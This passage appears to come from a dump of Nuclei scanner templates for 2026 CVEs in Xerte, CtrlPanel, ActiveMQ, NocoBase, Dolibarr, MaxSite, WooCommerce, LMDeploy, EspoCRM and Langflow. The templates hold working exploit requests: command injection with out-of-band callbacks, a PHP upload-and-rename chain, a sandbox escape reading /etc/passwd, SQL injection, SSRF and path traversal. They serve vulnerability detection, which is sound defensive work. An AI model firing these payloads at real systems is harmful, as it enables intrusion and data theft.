cve,cve2026,xerte,elfinder,rce,unauth,intrusive,file-upload\n\nvariables:\n  num: \"999999999\"\n  rand: \"{{rand_text_alpha(8)}}\"\n\nflow: |\n  http(1);\n  if (template[\"webroot\"]) {\n    http(2);\n    if (template[\"authbypass\"]) {\n      for (let pid = 1; pid <= 30; pid++) {\n        set(\"pid\", pid);\n        http(3);\n        http(4);\n        http(5);\n        if (http(6)) {\n          break;\n        }\n      }\n    }\n  }\n\nhttp:\n  - raw:\n      - |\n        GET /setup/ HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: webroot\n        part: body\n        group: 1\n        regex:\n          - '<code>([^<]+)</code>'\n        internal: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"Welcome to Xerte Online Toolkits Installer\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /editor/elfinder/php/connector.php HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: authbypass\n        part: body\n        regex:\n          - \"Invalid upload location\"\n        internal: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 302'\n          - 'contains(body, \"Invalid upload location\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/&cmd=mkdir&name={{rand}}{{pid}}&target=l1_Lw HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 302'\n          - 'contains_all(body, \"added\", \"hash\", \"name\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/ HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----xerteboundary\n\n        ------xerteboundary\n        Content-Disposition: form-data; name=\"cmd\"\n\n        upload\n        ------xerteboundary\n        Content-Disposition: form-data; name=\"target\"\n\n        l1_Lw\n        ------xerteboundary\n        Content-Disposition: form-data; name=\"upload[]\"; filename=\"{{rand}}{{pid}}.txt\"\n        Content-Type: text/plain\n\n        <br><?php echo md5(\"{{num}}\"); unlink(__FILE__); ?>\n        ------xerteboundary--\n\n    extractors:\n      - type: regex\n        name: fileid\n        part: body\n        group: 1\n        regex:\n          - '\"hash\":\"(l1_[^\"]+)\"'\n        internal: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 302'\n          - 'contains_all(body, \"added\", \"hash\", \"name\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /editor/elfinder/php/connector.php?uploadDir={{webroot}}USER-FILES/{{pid}}--Nottingham/&uploadURL={{BaseURL}}/USER-FILES/{{pid}}--Nottingham/&cmd=rename&target={{fileid}}&name={{rand}}{{pid}}/../../../../{{rand}}{{pid}}.php4 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 302'\n        internal: true\n\n  - raw:\n      - |\n        GET /{{rand}}{{pid}}.php4 HTTP/1.1\n        Host: {{Hostname}}\n\n    stop-at-first-match: true\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"c8c605999f3d8352d7bb792cf3fdb25b\")'\n        condition: and\n# digest: 490a0046304402207a6dea42706971e903988f60c4348a1e2ac792306cac30c42319a1a9769b218c022027486b56058e3b60b6d4df86348656df5bf627b1ecc3b9f956658cc024ca6fcc:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-34413.yaml","vuln_id":"cve-2026-34413"},{"raw":"id: CVE-2026-34234\n\ninfo:\n  name: CtrlPanel <= 1.1.1 - Remote Code Execution\n  author: ritikchaddha\n  severity: critical\n  description: |\n    CtrlPanel versions <= 1.1.1 are vulnerable to unauthenticated Remote Code Execution (RCE) via the web installer endpoint (public/installer/index.php). The installer loaded and executed form handler files before checking for the install.lock gate, allowing attackers to reach installer forms on fully-deployed instances. User-supplied POST values (url, key, clientkey) from the Pterodactyl configuration form were interpolated directly into shell command strings executed via bash -c without sanitization, enabling command injection. The vulnerability is confirmed actively exploited in the wild.\n  impact: |\n    Unauthenticated attackers can execute arbitrary OS commands with web server process privileges on any CtrlPanel instance where /installer/index.php is accessible. Consequences include full server compromise, extraction of .env database credentials and application secrets, persistent backdoor installation, and lateral movement.\n  remediation: |\n    Update to CtrlPanel v1.2.0 or later. The patch moves the install.lock check to the top of index.php before any form files are loaded, and replaces string-based proc_open() calls with array-style argument lists to prevent shell injection. As an immediate mitigation, deny web server access to the /installer/ directory.\n  reference:\n    - https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-jmhr-q9q5-fqwh\n    - https://github.com/rootdirective-sec/CVE-2026-34234-Lab\n    - https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34234\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-34234\n    epss-score: 0.03114\n    epss-percentile: 0.8723\n    cwe-id: CWE-78\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: ctrlpanel-gg\n    product: ctrlpanel\n    shodan-query: title:\"CtrlPanel\" http.html:\"ctrlpanel\"\n    fofa-query: title=\"CtrlPanel\"\n  tags: cve,cve2026,ctrlpanel,rce,oast,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /installer/index.php HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'installation')\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /installer/index.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        checkPtero=1&url=http%3A%2F%2F{{interactsh-url}}&key=asdasdasda%27%27+%26%26+bash+-c+%27nslookup+{{interactsh-url}}%27&clientkey=asdasdasd\n\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n# digest: 4b0a0048304602210083ca266564cbe33bf7e95a666620de7c1576b1ad3c15bb3c61f3207647d50fa9022100c309b223d953876e1f79a6d658efae60a5b06a8572a75ff584e079b9948cd538:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-34234.yaml","vuln_id":"cve-2026-34234"},{"raw":"id: CVE-2026-34197\n\ninfo:\n  name: Apache ActiveMQ - Remote Code Execution\n  author: DhiyaneshDk,horizon3\n  severity: critical\n  description: |\n    Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: . Users are recommended to upgrade to version 5.19.5 or 6.2.3, which fixes the issue.\n  impact: |\n    Authenticated attackers can execute arbitrary code on the broker JVM, potentially leading to full system compromise.\n  remediation: |\n    Upgrade to version 5.19.5 or 6.2.3 or later.\n  reference:\n    - https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/\n    - https://activemq.apache.org/security-advisories\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34197\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2026-34197\n    epss-score: 0.98256\n    epss-percentile: 0.99913\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: apache\n    product: activemq\n    shodan-query: title:\"ActiveMQ\" port:8161\n    fofa-query: title=\"ActiveMQ\" && port=\"8161\"\n  tags: cve,cve2026,activemq,jolokia,rce,oast,java,oob,kev,vkev\n\nvariables:\n  filename: \"{{to_lower(rand_text_alpha(5))}}\"\n  string: \"{{to_lower(rand_text_alpha(6))}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/jolokia/ HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Origin: {{RootURL}}\n\n        [{\"type\":\"exec\",\"mbean\":\"org.apache.activemq:type=Broker,brokerName=localhost\",\"operation\":\"removeNetworkConnector\",\"arguments\":[\"NC\"]},{\"type\":\"exec\",\"mbean\":\"org.apache.activemq:type=Broker,brokerName=localhost\",\"operation\":\"addNetworkConnector\",\"arguments\":[\"static:(vm://{{string}}?brokerConfig=xbean:http://{{interactsh-url}}/{{filename}}.xml)\"]}]\n\n      - |\n        POST /api/jolokia/ HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Origin: {{RootURL}}\n        Authorization: Basic YWRtaW46YWRtaW4=\n\n        [{\"type\":\"exec\",\"mbean\":\"org.apache.activemq:type=Broker,brokerName=localhost\",\"operation\":\"removeNetworkConnector\",\"arguments\":[\"NC\"]},{\"type\":\"exec\",\"mbean\":\"org.apache.activemq:type=Broker,brokerName=localhost\",\"operation\":\"addNetworkConnector\",\"arguments\":[\"static:(vm://{{string}}?brokerConfig=xbean:http://{{interactsh-url}}/{{filename}}.xml)\"]}]\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '[{\"request\":{'\n          - 'org.apache.activemq'\n        condition: and\n\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n          - \"dns\"\n        condition: or\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100eaa6864c23e88285b0ae89b4454f57507cdffff43b1a4f87eea2ca4947b1389d0221008923781090742896b851825ab3dae9a362cef3b27468faf1f0aa611f98a84576:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-34197.yaml","vuln_id":"cve-2026-34197"},{"raw":"id: CVE-2026-34156\n\ninfo:\n  name: NocoBase - VM Sandbox Escape to Remote Code Execution\n  author: theamanrawat\n  severity: critical\n  description: |\n    NocoBase Workflow Script Node executes user-supplied JavaScript inside a Node.js vm sandbox with a custom require allowlist controlled by WORKFLOW_SCRIPT_MODULES env var. The console object passed into the sandbox context exposes host-realm WritableWorkerStdio stream objects via console._stdout and console._stderr. An authenticated attacker can traverse the prototype chain (console._stdout.constructor.constructor to Function to process to child_process) to escape the sandbox and achieve Remote Code Execution as root.\n  remediation: |\n    Upgrade to NocoBase version 2.0.28 or later. Replace Node.js vm module with isolated-vm for true V8 isolate separation. Do not pass the host console object into the sandbox. Run the application as a non-root user inside Docker. Restrict /api/flow_nodes:test to admin-only roles.\n  reference:\n    - https://github.com/advisories/GHSA-px3p-vgh9-m57c\n    - https://github.com/nocobase/nocobase/security/advisories/GHSA-px3p-vgh9-m57c\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34156\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-34156\n    epss-score: 0.34966\n    epss-percentile: 0.98363\n    cwe-id: CWE-913\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: nocobase\n    product: nocobase\n    shodan-query: http.title:\"NocoBase\"\n    fofa-query: body=\"__nocobase_public_path__\"\n  tags: cve,cve2026,nocobase,rce,sandbox-escape,workflow,vm-escape,authenticated,vuln\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"nocobase_api_base_url\", \"nocobase_api_client_share_token\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /api/auth:signIn HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"account\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"token\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: token\n        part: body\n        internal: true\n        regex:\n          - '\"token\":\"([^\"]+)\"'\n        group: 1\n\n  - raw:\n      - |\n        POST /api/flow_nodes:test HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{token}}\n\n        {\"type\":\"script\",\"config\":{\"content\":\"const Fn=console._stdout.constructor.constructor;const proc=Fn('return process')();const cp=proc.mainModule.require('child_process');return cp.execSync('cat /etc/passwd').toString().trim();\",\"timeout\":5000,\"arguments\":[]}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'regex(\"root:.*:0:0:\", body)'\n          - 'contains(content_type, \"application/json\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4b0a00483046022100ef1f63ed2e36198b24d0f2a69dd5ebc5f48a4658f06587ca941a678f70be4d13022100d9d3fd54dc007ae43825c66d2216dcd8cea7582db3c5dee475f471ca8ae886ea:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-34156.yaml","vuln_id":"cve-2026-34156"},{"raw":"id: CVE-2026-34036\n\ninfo:\n  name: Dolibarr <=22.0.4 - Local File Inclusion\n  author: y0no\n  severity: medium\n  description: |\n    Dolibarr <= 22.0.4 contains a local file inclusion caused by manipulation of the objectdesc parameter and a fail-open logic flaw in restrictedArea() in /core/ajax/selectobject.php, letting authenticated users with no specific privileges read arbitrary non-PHP files.\n  impact: |\n    Authenticated users can read arbitrary non-PHP files, potentially exposing sensitive configuration and data files.\n  remediation: |\n    Update to the latest version once patches are available.\n  reference:\n    - https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r\n    - https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-34036\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 6.5\n    cve-id: CVE-2026-34036\n    epss-score: 0.01464\n    epss-percentile: 0.72501\n    cwe-id: CWE-98\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: dolibarr\n    product: dolibarr\n    shodan-query: http.title:\"Dolibarr\"\n  tags: cve,cve2026,dolibarr,lfi,auth,vuln,authenticated\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: csrf\n        part: body\n        group: 1\n        regex:\n          - 'name=\"token\" value=\"([a-f0-9]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /index.php?mainmenu=home HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        token={{csrf}}&actionlogin=login&loginfunction=loginfunction&username={{username}}&password={{password}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 302'\n        internal: true\n\n  - raw:\n      - |\n        GET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:includes/.htaccess:0 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"FilesMatch\"\n          - \"SetHandler\"\n        condition: and\n\n      - type: word\n        part: body\n        words:\n          - \"actionlogin\"\n          - \"Login @\"\n        condition: or\n        negative: true\n# digest: 4a0a00473045022100c4854dc470062902dd3cc1ca8f827c2e44e8795611970365bab3b829b538305502203a3a7109296a06db0d6191c44eb9c093c4f2705fca341674fac4e3a96345d411:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-34036.yaml","vuln_id":"cve-2026-34036"},{"raw":"id: CVE-2026-3396\n\ninfo:\n  name: WCAPF WooCommerce Ajax Product Filter - SQL Injection\n  author: theamanrawat\n  severity: high\n  description: |\n    WCAPF WooCommerce Ajax Product Filter <= 4.2.3 contains a time-based SQL injection caused by insufficient escaping of the 'post-author' parameter, letting unauthenticated attackers extract sensitive database information remotely.\n  impact: |\n    Unauthenticated attackers can extract sensitive database information, potentially compromising data confidentiality.\n  remediation: |\n    Update to a version later than 4.2.3 or the latest available version.\n  reference:\n    - https://patchstack.com/database/vulnerability/wordpress-wcapf-woocommerce-ajax-product-filter-plugin-4-2-3-unauthenticated-time-based-sql-injection-vulnerability\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-3396\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-3396\n    epss-score: 0.01473\n    epss-percentile: 0.72669\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: 'http.html:\"/wp-content/plugins/wc-ajax-product-filter/\"'\n    fofa-query: 'body=\"/wp-content/plugins/wc-ajax-product-filter/\"'\n  tags: sqli,wp-plugin,wc-ajax-product-filter,woocommerce,wordpress\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/wc-ajax-product-filter/readme.txt\"\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n\n      - type: word\n        words:\n          - \"WCAPF\"\n          - \"WooCommerce Ajax Product Filter\"\n        condition: and\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/shop/?filter_post_author=1%27%20AND%20SLEEP(6)%20AND%20%271%27%3D%271\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=6'\n          - 'contains(body, \"No results found\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4b0a00483046022100b6442806887c61544d0715541996faecf1c17c5101057417a8577eca11d9c9ff022100dcf6a2b901dba7df03f52af17c04a73643ba9605b6d46ef6813cd3c7f4bd406f:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-3396.yaml","vuln_id":"cve-2026-3396"},{"raw":"id: CVE-2026-3395\n\ninfo:\n  name: MaxSite CMS <=109.1 - Remote Code Execution\n  author: ritikchaddha\n  severity: high\n  description: |\n    MaxSite CMS through 109.1 allows unauthenticated remote attackers to execute arbitrary code via the MarkItUp editor preview AJAX endpoint, preview-ajax.php. The endpoint insufficiently authenticates the request, failing to ensure the user is logged in, and processes the attacker's input via unsafe usage of PHP eval() on user-supplied [php]...[/php] shortcodes. By providing a POST request to the vulnerable /ajax/ endpoint with crafted input, attackers may achieve remote code execution. The issue is addressed in version 109.2 by implementing proper authentication controls.\n  reference:\n    - https://github.com/mbanyamer/CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE\n    - https://github.com/rootdirective-sec/CVE-2026-3395-Lab\n    - https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3\n    - https://vuldb.com/?id.348281\n    - https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/large-scale-exploitation-campaign-targeting-website-content-management-systems-cms\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-3395\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n    cvss-score: 7.3\n    cve-id: CVE-2026-3395\n    epss-score: 0.0388\n    epss-percentile: 0.89757\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: max-3000\n    product: maxsite_cms\n    shodan-query: \"MaxSite CMS\"\n    fofa-query: \"MaxSite CMS\"\n    publicwww-query: \"MaxSite CMS\"\n  tags: cve,cve2026,rce,maxsite,cms,eval,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"MaxSite CMS\"\n          - \"maxsite_cms\"\n          - \"max-3000.com\"\n          - \"/maxsite/\"\n        case-insensitive: true\n        internal: true\n\n  - raw:\n      - |\n        POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA== HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        X-Requested-With: XMLHttpRequest\n\n        data=%5Bphp%5Decho+md5%28%27cve-2026-3395-nuclei%27%29%3B%5B%2Fphp%5D\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"a92788d6874137d1c4c4eaf6b6c0806a\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022062f0c6419de4846df3911ad2a265ebdc56bdefeab6f5755c4b14b8c7536c2cc6022100f3b08d1dcfc561fc34d4187a8c5929a8948299b7ce834eb4dd193cf9ab6c9fe4:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-3395.yaml","vuln_id":"cve-2026-3395"},{"raw":"id: CVE-2026-33868\n\ninfo:\n  name: Mastodon - Open Redirect\n  author: theamanrawat\n  severity: medium\n  description: |\n    Mastodon version < 4.5.8, < 4.4.15, < 4.3.21 is vulnerable to unauthenticated Open Redirect vulnerability (CWE-601) exists in the /web/* route due to improper handling of URL-encoded path segments.\n  impact: |\n    Redirect users to external domain.\n  remediation: |\n    Update Mastodon to versions 4.5.8, 4.4.15, 4.3.21.\n  reference:\n    - https://github.com/mastodon/mastodon/security/advisories/GHSA-xqw8-4j56-5hj6\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-33868\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\n    cvss-score: 4.3\n    cve-id: CVE-2026-33868\n    epss-score: 0.00473\n    epss-percentile: 0.40124\n    cwe-id: CWE-601\n  metadata:\n    verified: true\n    vendor: mastodon\n    product: mastodon\n    shodan-query: html:\"mastodon-\"\n  tags: cve,cve2026,mastodon,open-redirect,vuln,unauth\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/web/%2Finteract.sh:443\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n        part: header\n\n      - type: status\n        condition: or\n        status:\n          - 302\n          - 301\n# digest: 4a0a00473045022034deb8b0b5b48172d37a61cd149f1f8e290885f15a10f3a1bcfad0ad50c374eb0221009e5a26a7dd7caac00bd059aeb0d0f72345262a6c3e1418634a392b121817f918:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-33868.yaml","vuln_id":"cve-2026-33868"},{"raw":"id: CVE-2026-33626\n\ninfo:\n  name: LMDeploy - Server-Side Request Forgery\n  author: theamanrawat\n  severity: high\n  description: |\n    LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in the vision-language module. The load_image() function in lmdeploy/vl/utils.py fetches arbitrary URLs without validating internal or private IP addresses, allowing unauthenticated attackers to access cloud metadata services, internal networks, and sensitive resources via the image_url parameter in /v1/chat/completions requests.\n  impact: |\n    An unauthenticated attacker can force the LMDeploy server to make HTTP requests to arbitrary internal or external addresses, leading to cloud credential theft via metadata APIs, internal service enumeration, and information disclosure.\n  remediation: |\n    Upgrade LMDeploy to version 0.12.3 or later where URL validation via _is_safe_url() blocks requests to non-globally-routable IP addresses.\n  reference:\n    - https://github.com/advisories/GHSA-6w67-hwm5-92mq\n    - https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-33626\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-33626\n    epss-score: 0.4525\n    epss-percentile: 0.98732\n    cwe-id: CWE-918\n  metadata:\n    verified: false\n    max-request: 2\n    vendor: internlm\n    product: lmdeploy\n  tags: cve,cve2026,lmdeploy,ssrf,oast,llm,vkev,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/v1/models\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains(body, \"lmdeploy\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /v1/chat/completions HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"model\":\"internlm-xcomposer2\",\"messages\":[{\"role\":\"user\",\"content\":[{\"type\":\"text\",\"text\":\"Describe this image\"},{\"type\":\"image_url\",\"image_url\":{\"url\":\"http://{{interactsh-url}}\"}}]}]}\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(interactsh_protocol, \"http\")'\n          - 'contains(interactsh_request, \"User-Agent\")'\n        condition: and\n# digest: 490a00463044022010848c18255f6c3f1dedce1afbed7b067806f0a91b27d4a21f7972aea9c4ffc502200a9d5a66736891c15c58cada2cd8d9d0652c53bc820fe3a7b1d2da44600e68dd:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-33626.yaml","vuln_id":"cve-2026-33626"},{"raw":"id: CVE-2026-33534\n\ninfo:\n  name: EspoCRM <= 9.3.3 - Server-Side Request Forgery\n  author: EntroVyx\n  severity: medium\n  description: |\n    EspoCRM <= 9.3.3 contains an authenticated server-side request forgery caused by improper internal-host validation using alternative IPv4 formats in HostCheck::isNotInternalHost(), letting authenticated users access internal resources via /api/v1/Attachment/fromImageUrl endpoint.\n  impact: |\n    Authenticated attackers can access internal network resources, potentially exposing sensitive data or internal services.\n  remediation: |\n    Upgrade to version 9.3.4 or later.\n  reference:\n    - https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-33534\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 4.3\n    cve-id: CVE-2026-33534\n    epss-score: 0.01978\n    epss-percentile: 0.79613\n    cwe-id: CWE-918\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: espocrm\n    product: espocrm\n  tags: cve,cve2026,espocrm,ssrf,authenticated,intrusive\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/Attachment/fromImageUrl HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic {{base64(username + ':' + password)}}\n        Content-Type: application/json\n\n        {\"url\":\"http://127.0.0.1:80/client/img/logo-light.svg\",\"field\":\"avatar\",\"parentType\":\"User\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 403'\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/Attachment/fromImageUrl HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic {{base64(username + ':' + password)}}\n        Content-Type: application/json\n\n        {\"url\":\"http://0177.0.0.1:80/client/img/logo-light.svg\",\"field\":\"avatar\",\"parentType\":\"User\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"\\\"id\\\"\", \"\\\"field\\\":\\\"avatar\\\"\", \"\\\"parentType\\\":\\\"User\\\"\", \"0177.0.0.1\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a0047304502202058a28b4b813d663bbee3ccda2707fcd58773d391e4d9286fc3e721e6ab3b4a022100d8ab89fa34e61a32190c17932738dae8a7bfed0fa421a499958c62e9c0723b9a:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-33534.yaml","vuln_id":"cve-2026-33534"},{"raw":"id: CVE-2026-33497\n\ninfo:\n  name: Langflow < 1.7.0 - Path Traversal\n  author: xtr0nix\n  severity: high\n  description: |\n    Langflow < 1.7.1 contains a path traversal caused by insufficient filtering of folder_name and file_name parameters in download_profile_picture endpoint, letting attackers read secret_key across directories, exploit requires crafted request.\n  impact: |\n    Attackers can read sensitive secret_key files across directories, potentially compromising system security.\n  remediation: |\n    Update to version 1.7.1 or later.\n  reference:\n    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-33497\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-33497\n    epss-score: 0.19584\n    epss-percentile: 0.97262\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"Langflow\"\n  tags: cve,cve2026,langflow,traversal,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/files/profile_pictures/../secret_key\"\n\n    matchers:\n      - type: dsl\n        